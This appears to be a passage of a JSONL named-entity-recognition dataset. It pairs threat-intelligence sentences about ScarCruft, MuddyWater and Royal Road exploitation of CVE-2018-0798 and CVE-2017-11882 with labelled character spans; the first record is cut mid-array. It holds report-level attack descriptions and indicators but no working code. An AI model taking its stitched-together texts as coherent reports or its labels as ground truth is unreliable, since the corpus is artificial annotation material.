1365, "label": "Malware"}, {"start": 1402, "end": 1410, "label": "Indicator"}, {"start": 1458, "end": 1465, "label": "Indicator"}, {"start": 1468, "end": 1476, "label": "Indicator"}, {"start": 1530, "end": 1551, "label": "Malware"}, {"start": 1554, "end": 1566, "label": "Indicator"}, {"start": 1680, "end": 1688, "label": "Indicator"}, {"start": 1689, "end": 1696, "label": "Vulnerability"}, {"start": 1852, "end": 1860, "label": "Malware"}, {"start": 1886, "end": 1907, "label": "Malware"}, {"start": 1910, "end": 1918, "label": "Indicator"}, {"start": 2034, "end": 2042, "label": "Indicator"}, {"start": 2121, "end": 2129, "label": "Indicator"}, {"start": 2184, "end": 2192, "label": "Indicator"}, {"start": 2223, "end": 2228, "label": "Indicator"}, {"start": 2229, "end": 2237, "label": "Indicator"}, {"start": 2297, "end": 2315, "label": "Malware"}, {"start": 2316, "end": 2322, "label": "Malware"}, {"start": 2372, "end": 2380, "label": "Indicator"}, {"start": 2389, "end": 2397, "label": "Organization"}, {"start": 2471, "end": 2479, "label": "Vulnerability"}, {"start": 2509, "end": 2518, "label": "Organization"}, {"start": 2521, "end": 2530, "label": "Indicator"}, {"start": 2619, "end": 2627, "label": "Vulnerability"}, {"start": 2664, "end": 2672, "label": "Organization"}, {"start": 2673, "end": 2688, "label": "Vulnerability"}, {"start": 2715, "end": 2722, "label": "System"}, {"start": 2767, "end": 2775, "label": "Organization"}, {"start": 2806, "end": 2815, "label": "Indicator"}, {"start": 2967, "end": 2982, "label": "Indicator"}, {"start": 2983, "end": 2999, "label": "Malware"}, {"start": 3002, "end": 3015, "label": "Vulnerability"}, {"start": 3043, "end": 3050, "label": "Vulnerability"}, {"start": 3051, "end": 3071, "label": "Indicator"}, {"start": 3076, "end": 3095, "label": "Indicator"}, {"start": 3171, "end": 3178, "label": "Vulnerability"}, {"start": 3186, "end": 3200, "label": "Indicator"}, {"start": 3214, "end": 3228, "label": "Indicator"}, {"start": 3235, "end": 3242, "label": "Vulnerability"}, {"start": 3247, "end": 3260, "label": "Indicator"}, {"start": 3378, "end": 3398, "label": "Malware"}, {"start": 3435, "end": 3443, "label": "Vulnerability"}, {"start": 3502, "end": 3511, "label": "Organization"}, {"start": 3527, "end": 3546, "label": "Malware"}, {"start": 3564, "end": 3573, "label": "Malware"}, {"start": 3674, "end": 3688, "label": "Organization"}, {"start": 3742, "end": 3749, "label": "Organization"}, {"start": 3759, "end": 3773, "label": "Organization"}, {"start": 3867, "end": 3875, "label": "Organization"}, {"start": 3915, "end": 3922, "label": "Organization"}, {"start": 3943, "end": 3946, "label": "System"}, {"start": 3966, "end": 3979, "label": "Vulnerability"}, {"start": 3983, "end": 3995, "label": "Indicator"}, {"start": 4006, "end": 4013, "label": "Indicator"}, {"start": 4026, "end": 4037, "label": "Indicator"}, {"start": 4093, "end": 4095, "label": "Indicator"}, {"start": 4187, "end": 4198, "label": "Organization"}, {"start": 4232, "end": 4256, "label": "Organization"}, {"start": 4287, "end": 4296, "label": "Indicator"}, {"start": 4397, "end": 4405, "label": "Vulnerability"}, {"start": 4497, "end": 4514, "label": "Malware"}, {"start": 4519, "end": 4524, "label": "Malware"}, {"start": 4610, "end": 4622, "label": "Organization"}, {"start": 4726, "end": 4735, "label": "Indicator"}, {"start": 4876, "end": 4888, "label": "Indicator"}, {"start": 4929, "end": 4938, "label": "Organization"}, {"start": 4945, "end": 4955, "label": "Indicator"}, {"start": 5014, "end": 5023, "label": "Organization"}, {"start": 5119, "end": 5126, "label": "Organization"}, {"start": 5222, "end": 5228, "label": "Organization"}, {"start": 5284, "end": 5287, "label": "Malware"}, {"start": 5288, "end": 5297, "label": "Malware"}, {"start": 5313, "end": 5320, "label": "Indicator"}, {"start": 5505, "end": 5509, "label": "Organization"}, {"start": 5585, "end": 5596, "label": "Malware"}, {"start": 5601, "end": 5616, "label": "Malware"}, {"start": 5619, "end": 5626, "label": "Indicator"}, {"start": 5652, "end": 5662, "label": "Indicator"}, {"start": 5702, "end": 5706, "label": "Indicator"}, {"start": 5709, "end": 5715, "label": "Organization"}, {"start": 5731, "end": 5748, "label": "Organization"}, {"start": 5775, "end": 5781, "label": "System"}, {"start": 5822, "end": 5829, "label": "System"}, {"start": 5834, "end": 5839, "label": "System"}, {"start": 5895, "end": 5904, "label": "Organization"}, {"start": 5930, "end": 5938, "label": "Organization"}, {"start": 6173, "end": 6181, "label": "Organization"}, {"start": 6192, "end": 6200, "label": "Malware"}, {"start": 6210, "end": 6215, "label": "Malware"}, {"start": 6321, "end": 6329, "label": "Organization"}, {"start": 6338, "end": 6354, "label": "Malware"}, {"start": 6387, "end": 6395, "label": "Malware"}, {"start": 6396, "end": 6403, "label": "Malware"}, {"start": 6418, "end": 6421, "label": "Organization"}, {"start": 6438, "end": 6446, "label": "Organization"}, {"start": 6685, "end": 6692, "label": "Indicator"}, {"start": 6736, "end": 6752, "label": "Indicator"}, {"start": 6796, "end": 6812, "label": "Indicator"}, {"start": 6834, "end": 6843, "label": "Organization"}, {"start": 6992, "end": 7000, "label": "Malware"}, {"start": 7015, "end": 7020, "label": "Malware"}, {"start": 7055, "end": 7068, "label": "Indicator"}, {"start": 7161, "end": 7170, "label": "Indicator"}, {"start": 7232, "end": 7246, "label": "Indicator"}, {"start": 7266, "end": 7283, "label": "Indicator"}, {"start": 7367, "end": 7380, "label": "Indicator"}, {"start": 7397, "end": 7415, "label": "Indicator"}, {"start": 7514, "end": 7530, "label": "Indicator"}, {"start": 7537, "end": 7545, "label": "Indicator"}, {"start": 7575, "end": 7579, "label": "Organization"}, {"start": 7592, "end": 7597, "label": "Indicator"}, {"start": 7796, "end": 7805, "label": "Organization"}, {"start": 7830, "end": 7837, "label": "Organization"}, {"start": 8046, "end": 8051, "label": "Indicator"}, {"start": 8276, "end": 8281, "label": "Organization"}, {"start": 8294, "end": 8303, "label": "Malware"}, {"start": 8306, "end": 8311, "label": "Malware"}, {"start": 8339, "end": 8367, "label": "Malware"}, {"start": 8422, "end": 8427, "label": "Indicator"}, {"start": 8807, "end": 8815, "label": "Organization"}, {"start": 9006, "end": 9034, "label": "Organization"}, {"start": 9072, "end": 9096, "label": "Organization"}, {"start": 9126, "end": 9134, "label": "Organization"}, {"start": 9217, "end": 9223, "label": "Indicator"}, {"start": 9327, "end": 9340, "label": "Organization"}, {"start": 9568, "end": 9573, "label": "Organization"}, {"start": 9777, "end": 9788, "label": "Organization"}, {"start": 9800, "end": 9807, "label": "Organization"}, {"start": 9851, "end": 9868, "label": "Malware"}, {"start": 9878, "end": 9888, "label": "Organization"}, {"start": 9933, "end": 9942, "label": "Organization"}, {"start": 10127, "end": 10139, "label": "System"}, {"start": 10178, "end": 10185, "label": "Organization"}, {"start": 10212, "end": 10226, "label": "Malware"}, {"start": 10265, "end": 10275, "label": "System"}, {"start": 10328, "end": 10330, "label": "Organization"}, {"start": 10384, "end": 10391, "label": "System"}, {"start": 10435, "end": 10442, "label": "Indicator"}, {"start": 10491, "end": 10501, "label": "Malware"}, {"start": 10540, "end": 10545, "label": "Organization"}, {"start": 10760, "end": 10765, "label": "Organization"}, {"start": 10880, "end": 10911, "label": "Organization"}, {"start": 10914, "end": 10924, "label": "Organization"}, {"start": 10950, "end": 10980, "label": "Organization"}, {"start": 10994, "end": 11000, "label": "Organization"}, {"start": 11128, "end": 11134, "label": "Organization"}, {"start": 11236, "end": 11242, "label": "Organization"}, {"start": 11346, "end": 11349, "label": "Indicator"}, {"start": 11409, "end": 11417, "label": "Organization"}, {"start": 11563, "end": 11566, "label": "Indicator"}, {"start": 11592, "end": 11601, "label": "Organization"}, {"start": 11679, "end": 11682, "label": "Indicator"}, {"start": 11810, "end": 11815, "label": "Organization"}, {"start": 11906, "end": 11916, "label": "Indicator"}, {"start": 11931, "end": 11934, "label": "Indicator"}, {"start": 12033, "end": 12046, "label": "Organization"}, {"start": 12342, "end": 12349, "label": "Organization"}, {"start": 12397, "end": 12400, "label": "Indicator"}, {"start": 12520, "end": 12525, "label": "Organization"}, {"start": 12616, "end": 12619, "label": "Indicator"}, {"start": 12675, "end": 12678, "label": "Indicator"}, {"start": 12711, "end": 12716, "label": "Organization"}, {"start": 12730, "end": 12742, "label": "Malware"}, {"start": 12830, "end": 12841, "label": "Malware"}, {"start": 12842, "end": 12844, "label": "Indicator"}, {"start": 12887, "end": 12892, "label": "Organization"}, {"start": 12907, "end": 12925, "label": "Malware"}, {"start": 12943, "end": 12948, "label": "Organization"}, {"start": 12983, "end": 12992, "label": "Organization"}, {"start": 13074, "end": 13078, "label": "Malware"}, {"start": 13179, "end": 13195, "label": "Organization"}, {"start": 13196, "end": 13203, "label": "Malware"}, {"start": 13283, "end": 13290, "label": "Organization"}, {"start": 13314, "end": 13330, "label": "Malware"}, {"start": 13347, "end": 13374, "label": "Malware"}, {"start": 13460, "end": 13469, "label": "Organization"}, {"start": 13482, "end": 13485, "label": "System"}, {"start": 13486, "end": 13493, "label": "Vulnerability"}, {"start": 13505, "end": 13509, "label": "Organization"}, {"start": 13567, "end": 13572, "label": "Malware"}, {"start": 13600, "end": 13603, "label": "System"}, {"start": 13680, "end": 13683, "label": "Indicator"}, {"start": 13739, "end": 13755, "label": "Organization"}, {"start": 13756, "end": 13767, "label": "Malware"}, {"start": 13792, "end": 13801, "label": "Organization"}, {"start": 13948, "end": 13954, "label": "Organization"}, {"start": 13983, "end": 13986, "label": "Indicator"}, {"start": 14050, "end": 14059, "label": "Organization"}, {"start": 14225, "end": 14231, "label": "Organization"}, {"start": 14274, "end": 14279, "label": "Organization"}, {"start": 14386, "end": 14392, "label": "Organization"}, {"start": 14520, "end": 14529, "label": "Organization"}, {"start": 14582, "end": 14588, "label": "Organization"}, {"start": 14597, "end": 14600, "label": "Indicator"}, {"start": 14647, "end": 14659, "label": "Malware"}, {"start": 14662, "end": 14672, "label": "Organization"}, {"start": 14726, "end": 14740, "label": "Organization"}, {"start": 14747, "end": 14767, "label": "Organization"}, {"start": 14813, "end": 14819, "label": "Organization"}, {"start": 14830, "end": 14838, "label": "Malware"}, {"start": 14841, "end": 14847, "label": "Malware"}, {"start": 14850, "end": 14857, "label": "Malware"}, {"start": 14864, "end": 14888, "label": "Malware"}, {"start": 14898, "end": 14910, "label": "Malware"}, {"start": 14960, "end": 14966, "label": "Organization"}, {"start": 15020, "end": 15023, "label": "Indicator"}, {"start": 15085, "end": 15091, "label": "Organization"}, {"start": 15092, "end": 15098, "label": "Organization"}, {"start": 15140, "end": 15144, "label": "Organization"}, {"start": 15211, "end": 15227, "label": "Malware"}, {"start": 15228, "end": 15235, "label": "Malware"}, {"start": 15406, "end": 15415, "label": "Organization"}, {"start": 15471, "end": 15480, "label": "Organization"}, {"start": 15563, "end": 15566, "label": "Malware"}, {"start": 15577, "end": 15580, "label": "System"}, {"start": 15667, "end": 15673, "label": "Organization"}, {"start": 15789, "end": 15800, "label": "Organization"}, {"start": 16028, "end": 16037, "label": "Malware"}, {"start": 16040, "end": 16042, "label": "Indicator"}, {"start": 16144, "end": 16153, "label": "Indicator"}, {"start": 16180, "end": 16197, "label": "Indicator"}, {"start": 16328, "end": 16338, "label": "Malware"}, {"start": 16380, "end": 16386, "label": "Organization"}, {"start": 16425, "end": 16432, "label": "Indicator"}, {"start": 16575, "end": 16591, "label": "Organization"}, {"start": 16667, "end": 16670, "label": "Organization"}, {"start": 16780, "end": 16802, "label": "Organization"}, {"start": 16952, "end": 16967, "label": "Malware"}, {"start": 16970, "end": 16977, "label": "Malware"}, {"start": 16980, "end": 16987, "label": "Malware"}, {"start": 17000, "end": 17010, "label": "Malware"}, {"start": 17011, "end": 17018, "label": "Malware"}, {"start": 17147, "end": 17156, "label": "Organization"}, {"start": 17231, "end": 17234, "label": "Organization"}, {"start": 17501, "end": 17504, "label": "Organization"}, {"start": 17702, "end": 17715, "label": "Malware"}, {"start": 17735, "end": 17740, "label": "Organization"}, {"start": 17787, "end": 17796, "label": "Malware"}, {"start": 17907, "end": 17920, "label": "Organization"}, {"start": 18053, "end": 18056, "label": "Organization"}, {"start": 18152, "end": 18157, "label": "Organization"}, {"start": 18374, "end": 18379, "label": "Organization"}, {"start": 18468, "end": 18475, "label": "Malware"}, {"start": 18486, "end": 18491, "label": "Malware"}, {"start": 18509, "end": 18512, "label": "Malware"}, {"start": 18523, "end": 18528, "label": "Malware"}, {"start": 18550, "end": 18567, "label": "Organization"}, {"start": 18623, "end": 18631, "label": "Organization"}, {"start": 18634, "end": 18639, "label": "Organization"}, {"start": 18727, "end": 18731, "label": "Malware"}, {"start": 18734, "end": 18737, "label": "Malware"}, {"start": 18762, "end": 18784, "label": "Malware"}, {"start": 18832, "end": 18835, "label": "Organization"}, {"start": 19046, "end": 19049, "label": "Organization"}, {"start": 19108, "end": 19117, "label": "Organization"}, {"start": 19118, "end": 19125, "label": "System"}, {"start": 19151, "end": 19156, "label": "Organization"}, {"start": 19255, "end": 19267, "label": "Malware"}, {"start": 19415, "end": 19430, "label": "Malware"}, {"start": 19535, "end": 19540, "label": "Organization"}, {"start": 19680, "end": 19688, "label": "Malware"}, {"start": 19693, "end": 19699, "label": "Malware"}, {"start": 19706, "end": 19709, "label": "Organization"}, {"start": 19793, "end": 19800, "label": "Malware"}, {"start": 19803, "end": 19811, "label": "Malware"}, {"start": 19814, "end": 19821, "label": "Malware"}, {"start": 19824, "end": 19829, "label": "Malware"}, {"start": 19855, "end": 19859, "label": "Malware"}, {"start": 19876, "end": 19885, "label": "Malware"}, {"start": 19890, "end": 19897, "label": "Malware"}, {"start": 20013, "end": 20018, "label": "Organization"}, {"start": 20023, "end": 20029, "label": "Organization"}, {"start": 20034, "end": 20037, "label": "Organization"}, {"start": 20143, "end": 20146, "label": "Organization"}, {"start": 20331, "end": 20336, "label": "Organization"}, {"start": 20405, "end": 20413, "label": "Organization"}, {"start": 20433, "end": 20455, "label": "Malware"}, {"start": 20548, "end": 20556, "label": "Organization"}, {"start": 20604, "end": 20609, "label": "Organization"}, {"start": 20637, "end": 20640, "label": "Organization"}, {"start": 20641, "end": 20648, "label": "Malware"}, {"start": 20722, "end": 20729, "label": "System"}, {"start": 20927, "end": 20933, "label": "Organization"}, {"start": 20950, "end": 20953, "label": "Organization"}, {"start": 21007, "end": 21010, "label": "Organization"}, {"start": 21044, "end": 21058, "label": "Organization"}, {"start": 21145, "end": 21150, "label": "Organization"}, {"start": 21175, "end": 21182, "label": "Organization"}, {"start": 21369, "end": 21374, "label": "Organization"}, {"start": 21375, "end": 21389, "label": "Malware"}, {"start": 21525, "end": 21534, "label": "Indicator"}, {"start": 21654, "end": 21658, "label": "Malware"}, {"start": 21679, "end": 21682, "label": "Organization"}, {"start": 21765, "end": 21768, "label": "Organization"}, {"start": 21871, "end": 21876, "label": "Organization"}, {"start": 21879, "end": 21888, "label": "Organization"}, {"start": 21891, "end": 21897, "label": "Organization"}, {"start": 21900, "end": 21907, "label": "Organization"}, {"start": 21910, "end": 21915, "label": "Organization"}, {"start": 21918, "end": 21928, "label": "Organization"}, {"start": 21931, "end": 21938, "label": "Organization"}, {"start": 21943, "end": 21963, "label": "Organization"}, {"start": 22019, "end": 22028, "label": "Organization"}, {"start": 22176, "end": 22180, "label": "Organization"}, {"start": 22262, "end": 22277, "label": "Organization"}, {"start": 22351, "end": 22362, "label": "Organization"}, {"start": 22363, "end": 22369, "label": "Organization"}, {"start": 22401, "end": 22404, "label": "Malware"}, {"start": 22440, "end": 22443, "label": "Organization"}, {"start": 22625, "end": 22640, "label": "Organization"}, {"start": 22645, "end": 22651, "label": "Organization"}, {"start": 22699, "end": 22708, "label": "Indicator"}, {"start": 22878, "end": 22880, "label": "System"}, {"start": 23095, "end": 23100, "label": "Organization"}, {"start": 23204, "end": 23212, "label": "Malware"}, {"start": 23263, "end": 23268, "label": "Organization"}, {"start": 23271, "end": 23276, "label": "Organization"}, {"start": 23334, "end": 23340, "label": "Malware"}, {"start": 23390, "end": 23397, "label": "System"}, {"start": 23416, "end": 23420, "label": "Malware"}, {"start": 23425, "end": 23432, "label": "System"}, {"start": 23453, "end": 23460, "label": "Indicator"}, {"start": 23717, "end": 23722, "label": "Organization"}, {"start": 23737, "end": 23748, "label": "Organization"}, {"start": 23751, "end": 23759, "label": "Organization"}, {"start": 23762, "end": 23766, "label": "Organization"}, {"start": 23940, "end": 23945, "label": "Organization"}, {"start": 24222, "end": 24225, "label": "Organization"}, {"start": 24454, "end": 24459, "label": "Organization"}, {"start": 24645, "end": 24650, "label": "Organization"}, {"start": 24667, "end": 24680, "label": "Organization"}, {"start": 24702, "end": 24717, "label": "Organization"}, {"start": 24856, "end": 24859, "label": "System"}, {"start": 24874, "end": 24881, "label": "Organization"}, {"start": 24895, "end": 24916, "label": "Organization"}, {"start": 24975, "end": 24984, "label": "Organization"}, {"start": 24996, "end": 25008, "label": "Organization"}, {"start": 25011, "end": 25016, "label": "Organization"}, {"start": 25078, "end": 25083, "label": "Organization"}, {"start": 25110, "end": 25120, "label": "Organization"}, {"start": 25123, "end": 25130, "label": "Organization"}, {"start": 25133, "end": 25142, "label": "Organization"}, {"start": 25145, "end": 25155, "label": "Organization"}, {"start": 25158, "end": 25172, "label": "Organization"}, {"start": 25177, "end": 25183, "label": "Organization"}, {"start": 25190, "end": 25194, "label": "Organization"}, {"start": 25199, "end": 25210, "label": "Organization"}, {"start": 25230, "end": 25237, "label": "Organization"}, {"start": 25294, "end": 25299, "label": "Organization"}, {"start": 25441, "end": 25446, "label": "Organization"}, {"start": 25474, "end": 25497, "label": "Organization"}, {"start": 25510, "end": 25532, "label": "Organization"}, {"start": 25759, "end": 25782, "label": "Organization"}, {"start": 25837, "end": 25852, "label": "Organization"}, {"start": 25920, "end": 25927, "label": "Organization"}, {"start": 25974, "end": 25978, "label": "Organization"}, {"start": 26054, "end": 26057, "label": "Organization"}, {"start": 26186, "end": 26191, "label": "Organization"}, {"start": 26519, "end": 26524, "label": "Organization"}, {"start": 26574, "end": 26580, "label": "Malware"}, {"start": 26585, "end": 26592, "label": "Malware"}, {"start": 26683, "end": 26692, "label": "Organization"}, {"start": 26847, "end": 26852, "label": "Organization"}, {"start": 27007, "end": 27015, "label": "Organization"}, {"start": 27024, "end": 27039, "label": "Organization"}, {"start": 27058, "end": 27063, "label": "Organization"}, {"start": 27112, "end": 27122, "label": "Organization"}, {"start": 27133, "end": 27139, "label": "Organization"}, {"start": 27219, "end": 27230, "label": "Indicator"}, {"start": 27401, "end": 27408, "label": "System"}, {"start": 27423, "end": 27428, "label": "System"}, {"start": 27431, "end": 27438, "label": "System"}, {"start": 27453, "end": 27463, "label": "System"}, {"start": 27585, "end": 27590, "label": "Organization"}, {"start": 27617, "end": 27628, "label": "Malware"}, {"start": 27631, "end": 27640, "label": "Malware"}, {"start": 27643, "end": 27652, "label": "Malware"}, {"start": 27655, "end": 27661, "label": "Malware"}, {"start": 27743, "end": 27758, "label": "Organization"}, {"start": 27971, "end": 27976, "label": "Organization"}, {"start": 28127, "end": 28132, "label": "Organization"}, {"start": 28232, "end": 28247, "label": "Organization"}, {"start": 28269, "end": 28274, "label": "Organization"}, {"start": 28568, "end": 28573, "label": "Organization"}, {"start": 28625, "end": 28628, "label": "Organization"}, {"start": 28640, "end": 28657, "label": "Organization"}, {"start": 28768, "end": 28772, "label": "Organization"}, {"start": 28793, "end": 28817, "label": "Organization"}, {"start": 29066, "end": 29072, "label": "Organization"}, {"start": 29185, "end": 29200, "label": "Malware"}, {"start": 29260, "end": 29265, "label": "Organization"}, {"start": 29307, "end": 29316, "label": "Malware"}, {"start": 29330, "end": 29332, "label": "System"}, {"start": 29471, "end": 29477, "label": "Indicator"}, {"start": 29497, "end": 29506, "label": "Indicator"}, {"start": 29538, "end": 29541, "label": "System"}, {"start": 29720, "end": 29738, "label": "Indicator"}, {"start": 29830, "end": 29835, "label": "Organization"}, {"start": 29846, "end": 29852, "label": "Malware"}, {"start": 29857, "end": 29861, "label": "Malware"}, {"start": 29866, "end": 29873, "label": "System"}, {"start": 29972, "end": 29979, "label": "System"}, {"start": 30032, "end": 30037, "label": "Organization"}, {"start": 30072, "end": 30079, "label": "Malware"}, {"start": 30087, "end": 30089, "label": "System"}, {"start": 30107, "end": 30113, "label": "System"}, {"start": 30127, "end": 30134, "label": "System"}, {"start": 30212, "end": 30217, "label": "Malware"}, {"start": 30233, "end": 30244, "label": "Malware"}, {"start": 30268, "end": 30274, "label": "Organization"}, {"start": 30292, "end": 30299, "label": "Malware"}, {"start": 30323, "end": 30332, "label": "Organization"}, {"start": 30417, "end": 30421, "label": "Organization"}, {"start": 30552, "end": 30560, "label": "Organization"}, {"start": 30588, "end": 30596, "label": "Organization"}, {"start": 30756, "end": 30762, "label": "Organization"}, {"start": 30778, "end": 30787, "label": "Organization"}, {"start": 30799, "end": 30805, "label": "Malware"}, {"start": 30901, "end": 30904, "label": "System"}, {"start": 30943, "end": 30948, "label": "Malware"}, {"start": 31005, "end": 31010, "label": "Organization"}, {"start": 31046, "end": 31051, "label": "Malware"}, {"start": 31054, "end": 31060, "label": "Malware"}, {"start": 31063, "end": 31069, "label": "Malware"}, {"start": 31072, "end": 31077, "label": "Malware"}, {"start": 31080, "end": 31086, "label": "Malware"}, {"start": 31110, "end": 31116, "label": "Organization"}, {"start": 31159, "end": 31166, "label": "Indicator"}, {"start": 31218, "end": 31221, "label": "System"}, {"start": 31304, "end": 31308, "label": "Indicator"}, {"start": 31311, "end": 31316, "label": "Organization"}, {"start": 31346, "end": 31354, "label": "Malware"}, {"start": 31370, "end": 31391, "label": "Organization"}, {"start": 31407, "end": 31412, "label": "Organization"}, {"start": 31449, "end": 31462, "label": "Malware"}, {"start": 31517, "end": 31522, "label": "Organization"}, {"start": 31551, "end": 31556, "label": "Organization"}, {"start": 31597, "end": 31618, "label": "Malware"}, {"start": 31708, "end": 31720, "label": "Organization"}, {"start": 31766, "end": 31769, "label": "System"}, {"start": 31819, "end": 31832, "label": "Indicator"}, {"start": 31863, "end": 31866, "label": "System"}, {"start": 32057, "end": 32062, "label": "Organization"}, {"start": 32204, "end": 32213, "label": "Malware"}, {"start": 32252, "end": 32255, "label": "System"}, {"start": 32296, "end": 32301, "label": "Organization"}, {"start": 32349, "end": 32362, "label": "Malware"}, {"start": 32480, "end": 32485, "label": "Organization"}, {"start": 32639, "end": 32646, "label": "Organization"}, {"start": 32647, "end": 32656, "label": "Malware"}, {"start": 32702, "end": 32714, "label": "Malware"}, {"start": 32819, "end": 32830, "label": "Organization"}, {"start": 32833, "end": 32838, "label": "Indicator"}, {"start": 32844, "end": 32859, "label": "Malware"}, {"start": 32924, "end": 32932, "label": "Organization"}, {"start": 32951, "end": 32957, "label": "Organization"}, {"start": 32974, "end": 32979, "label": "Organization"}, {"start": 32995, "end": 33010, "label": "Organization"}, {"start": 33081, "end": 33089, "label": "Organization"}, {"start": 33103, "end": 33111, "label": "Organization"}, {"start": 33162, "end": 33168, "label": "Malware"}, {"start": 33242, "end": 33245, "label": "System"}, {"start": 33265, "end": 33268, "label": "System"}, {"start": 33288, "end": 33294, "label": "Organization"}, {"start": 33310, "end": 33315, "label": "Organization"}, {"start": 33415, "end": 33423, "label": "Malware"}, {"start": 33454, "end": 33457, "label": "System"}, {"start": 33504, "end": 33507, "label": "System"}, {"start": 33535, "end": 33541, "label": "Organization"}, {"start": 33627, "end": 33634, "label": "Indicator"}, {"start": 33642, "end": 33644, "label": "System"}, {"start": 33651, "end": 33660, "label": "Organization"}, {"start": 33753, "end": 33758, "label": "Malware"}, {"start": 33860, "end": 33865, "label": "Organization"}, {"start": 34099, "end": 34104, "label": "Organization"}, {"start": 34110, "end": 34116, "label": "Malware"}, {"start": 34129, "end": 34137, "label": "Malware"}, {"start": 34141, "end": 34147, "label": "Malware"}, {"start": 34261, "end": 34268, "label": "Malware"}, {"start": 34271, "end": 34277, "label": "Organization"}, {"start": 34330, "end": 34337, "label": "System"}, {"start": 34368, "end": 34376, "label": "Organization"}, {"start": 34492, "end": 34505, "label": "Malware"}, {"start": 34508, "end": 34513, "label": "Organization"}, {"start": 34533, "end": 34542, "label": "Organization"}, {"start": 34543, "end": 34552, "label": "Malware"}, {"start": 34623, "end": 34625, "label": "System"}, {"start": 34713, "end": 34719, "label": "Organization"}, {"start": 34829, "end": 34834, "label": "Organization"}, {"start": 34927, "end": 34934, "label": "Organization"}, {"start": 34966, "end": 34970, "label": "Organization"}, {"start": 35400, "end": 35405, "label": "Organization"}, {"start": 35450, "end": 35458, "label": "Organization"}, {"start": 35593, "end": 35598, "label": "Organization"}]}
{"text": "Based on the ScarCruft\u2019s recent activities , Kaspersky strongly believes that this ScarCruft group is likely to continue to evolve . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft \u2019s Equation Editor ( EQNEDT32 ) .", "spans": [{"start": 13, "end": 24, "label": "Organization"}, {"start": 45, "end": 54, "label": "Organization"}, {"start": 83, "end": 92, "label": "Organization"}, {"start": 279, "end": 285, "label": "Indicator"}, {"start": 305, "end": 319, "label": "Vulnerability"}, {"start": 323, "end": 336, "label": "Vulnerability"}, {"start": 391, "end": 400, "label": "Indicator"}, {"start": 421, "end": 434, "label": "Vulnerability"}, {"start": 452, "end": 461, "label": "Organization"}, {"start": 465, "end": 480, "label": "System"}, {"start": 483, "end": 491, "label": "System"}]}
{"text": "Kaspersky also discovered an interesting piece of rare malware created by this threat actor ScarCruft . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . The earliest use of the exploit ITW we were able to identify and confirm is a sample e228045ef57fb8cc1226b62ada7eee9b dating back to October 2018 ( VirusTotal submission of 2018-10-29 ) with the RTF creation time 2018-10-23 .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 92, "end": 101, "label": "Organization"}, {"start": 104, "end": 111, "label": "Organization"}, {"start": 190, "end": 193, "label": "Indicator"}, {"start": 209, "end": 216, "label": "Vulnerability"}, {"start": 221, "end": 234, "label": "Vulnerability"}, {"start": 261, "end": 268, "label": "Vulnerability"}, {"start": 269, "end": 272, "label": "Indicator"}, {"start": 322, "end": 354, "label": "Indicator"}, {"start": 385, "end": 395, "label": "System"}, {"start": 432, "end": 435, "label": "System"}]}
{"text": "Kaspersky witnessed the ScarCruft threat actor extensively testing a known public exploit during its preparation for the next campaign . CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese Cyber Espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . Upon decrypting and executing , it drops two additional files wsc_proxy.exe\u201d (legitimate Avast executable) and a malicious DLL wsc.dll\u201d in the %TEMP% folder . However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit ( CVE-2018-0798 ) . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . In addition , a current ANY.RUN playback of our observed Elise infection is also available . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , 'EQNEDT32.exe' , scores high for potentially malicious activity . Most recently though , a new campaign , targeting Belarus , Turkey and Ukraine , has emerged that caught the attention of Check Point researchers . The well-crafted and socially engineered malicious documents then become the \ufb01rst stage of a long and mainly \ufb01leless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group . This powerful backdoor can receive commands from the attackers , enabling it to ex\ufb01ltrate \ufb01les from the system it is running on , execute additional scripts , delete \ufb01les , and more . If the macros in SPK KANUN DE\u011e\u0130\u015e\u0130KL\u0130\u011e\u0130 G\u0130B G\u00d6R\u00dc\u015e\u00dc.doc\u201d are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe\u201d . INF \ufb01les have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll . In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . Although it has focused most of its efforts on the Middle East region , the political af\ufb01liations , motives and purposes behind MuddyWater\u2019s attacks are not very well- de\ufb01ned , thus earning it its name . In the past , countries such as Saudi Arabia , the UAE and Turkey have been a MuddyWater's main target , but the campaigns have also reached a much wider audience , making their ACT to victims in countries such as Belarus and Ukraine . MuddyWater target groups across Middle East and Central Asia , primarily using spear phishing emails with malicious attachments . Most recently MuddyWater were connected to a campaign in March that targeted organizations in Turkey , Pakistan , and Tajikistan . The group has been quite visible since the initial 2017 Malwarebytes report on their elaborate espionage attack against the Saudi Arabian government . Our analysis revealed that they drop a new backdoor , which is written in PowerShell as MuddyWater\u2019s known POWERSTATS backdoor . We assume that RunPow stands for run PowerShell , \u201d and triggers the PowerShell code embedded inside the .dll file . This backdoor has some features similar to a previously discovered version of the Muddywater backdoor . Based on our analysis , we can confirm that MuddyWater target Turkish government organizations related to the finance and energy sectors . This is yet another similarity with previous MuddyWater campaigns , which were known to have targeted multiple Turkish government entities . The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents . Trend Micro\u2122 Deep Discovery\u2122 provides detection , in-depth analysis , and proactive response to today\u2019s stealthy malware , and targeted attacks in real time . 